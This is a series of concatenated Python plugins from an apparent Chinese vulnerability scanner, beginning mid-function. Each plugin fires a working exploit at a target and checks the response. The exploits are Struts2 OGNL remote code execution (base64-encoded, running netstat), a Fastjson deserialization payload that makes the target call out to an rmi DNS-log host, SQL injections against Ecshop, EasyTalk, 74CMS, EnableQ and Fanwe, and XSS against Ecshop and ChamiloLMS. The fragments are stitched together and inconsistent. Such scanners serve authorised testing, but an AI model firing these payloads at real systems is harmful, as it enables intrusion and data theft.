VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = base64.b64decode( "YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0=" ) try: payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-013\r\n返回数据:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/affiche.php?from=a.baidu.com%3Cscript%3Ealert({})%3C/script%3E&ad_id=-1".format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if con.find("<script>alert({})</script>".format(rm)) != -1: Medusa = "{}存在Ecshop跨站脚本漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/?m=index&a=checkreset' data = "urldata=YWFhYWFhYWEmdXNlcl9uYW1lPXl1XCZtYWlsYWRyZXM9VU5JT04vKiovU0VMRUNULyoqLzEsMixtZDUoMTIzMzIxKSw0LDUsNiw3LDgsOSwxMCwxMSwxMiwxMywxNCwxNSwxNiwxNywxOCwxOSwyMCwyMSwyMiwyMywyNCwyNSwyNiwyNywyOCwyOSwzMCwzMSwzMiwzMywzNCwzNSwzNiwzNywzOCwzOSw0MCw0MSM=" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("c8837b23ff8aaa8a2dde915473ce0991") != -1: Medusa = "{}存在EasyTalkSQL注入漏洞\r\n 验证数据:\r\nUrl:{}\r\n返回结果:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload_url = scheme + '://' + url + ':' + str(port) DL = Dnslog() #DL="dsada11111sda.xhqp3u.dnslog.cn" data = '''{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://%s/Exploit","autoCommit":true}''' % DL.dns_host( ) headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/json', 'Accept-Language': 'zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2', "Connection": "close", "Accept-Encoding": "gzip, deflate" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=10, verify=False) if DL.result() and resp.status_code == 400: Medusa = "{}存在Fastjson反序列化远程代码执行漏洞\r\n 验证数据:\r\n漏洞位置:{}\r\n返回数据:{}\r\nDNSlong:{}\r\n".format( url, payload_url, resp.text, DL.dns_host()) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, UnixTimestamp): scheme, url, port = UrlProcessing(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/plus/ajax_user.php" data = "sunrain%df%27%20or%20%df%271%df%27=%df%271&act=get_pass_check" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } s = requests.session() resp = s.post(payload_url, data=data, headers=headers, timeout=6, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("true") != -1: Medusa = "{}存在74CMS存在SQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, UnixTimestamp).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: rm = randoms().result(20) payload = "/main/calendar/agenda_list.php?type=personal%27%3E%3Cscript%3Econfirm%28{}%29%3C%2fscript%3E%3C%21--".format( rm) payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Content-Type': 'application/x-www-form-urlencoded', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", } resp = requests.get(payload_url, headers=headers, timeout=6, proxies=proxies, verify=False) con = resp.text if con.find("<script>confirm({})</script>".format(rm)) != -1: Medusa = "{}存在ChamiloLMS跨站脚本漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/r.php?qlang=cn&qid=&step=1" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, "X-Forwarded-For": "1.1.1.1", 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' } mail = "testvul" + str(random.randint(1000, 9999)) + "@testvul.net" data = 'administrators_Name=' + mail + '&nickName=testvul&passWord=123456&passWord2=123456&hintPass=3&answerPass=testvul&Action=MemberAddSubmit&submit=%D7%A2%B2%E1&qid=' resp = requests.post(payload_url, data=data, headers=headers, proxies=proxies, timeout=6, verify=False) con = resp.text if con.find("administratorsName") != -1 and con.find( "Bad SQL Query") != -1: Medusa = "{}存在EnableQSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port data = base64.b64decode( "ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeyduZXRzdGF0JywnLWFuJ30pKS5zdGFydCgpLCNiPSNhLmdldElucHV0U3RyZWFtKCksI2M9bmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoI2IpLCNkPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCNjKSwjZT1uZXcgY2hhclsxMDAwMF0sI2QucmVhZCgjZSksI3Jlc3AucHJpbnRsbigjZSksI3Jlc3AuY2xvc2UoKQ==" ) try: payload_url = scheme + "://" + url + ":" + str(port) + "/index.action" headers = { 'User-Agent': RandomAgent, "Accept": "application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", "Content-Type": "application/x-www-form-urlencoded" } resp = requests.post(payload_url, headers=headers, data=data, proxies=proxies, timeout=6, verify=False) con = resp.text resilt = Result(con) if resilt == "Linux" or resilt == "NoteOS" or resilt == "Windows": Medusa = "{} 存在Struts2远程代码执行漏洞\r\n漏洞详情:\r\n版本号:S2-019\r\n返回数据:{}\r\n部署系统:{}\r\n".format( url, con, resilt) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = '/flow.php?step=update_cart' data = "goods_number%5B1%27+and+%28select+1+from%28select+count%28*%29%2Cconcat%28%28select+%28select+%28SELECT+md5(3.1415)%29%29+from+information_schema.tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29+and+1%3D1+%23%5D=1&submit=exp" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("63e1f04640e83605c1d177544a5a0488") != -1: Medusa = "{}存在EcshopSQL注入漏洞\r\n漏洞地址:\r\n{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write(url, _) # 调用写入类传入URL和错误插件名
def medusa(Url, RandomAgent, proxies=None, **kwargs): proxies = Proxies().result(proxies) scheme, url, port = UrlProcessing().result(Url) if port is None and scheme == 'https': port = 443 elif port is None and scheme == 'http': port = 80 else: port = port try: payload = "/index.php?ctl=ajax&act=load_topic_reply_list" payload_url = scheme + "://" + url + ":" + str(port) + payload headers = { 'User-Agent': RandomAgent, 'Accept': 'application/json', "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", } data = 'topic_id=-1%20union%20select%0b1,2,3,md5(123456),5,6,7,8,9%23' resp = requests.post(payload_url, headers=headers, data=data, timeout=6, proxies=proxies, verify=False) con = resp.text code = resp.status_code if code == 200 and con.find("e10adc3949ba59abbe56e057f20f883e") != -1: Medusa = "{}存在FanweSQL注入漏洞\r\n漏洞地址:{}\r\n漏洞详情:{}\r\n".format( url, payload_url, con) _t = VulnerabilityInfo(Medusa) VulnerabilityDetails(_t.info, url, **kwargs).Write() # 传入url和扫描到的数据 WriteFile().result(str(url), str(Medusa)) #写入文件,url为目标文件名统一传入,Medusa为结果 except Exception as e: _ = VulnerabilityInfo('').info.get('algroup') ErrorHandling().Outlier(e, _) _l = ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类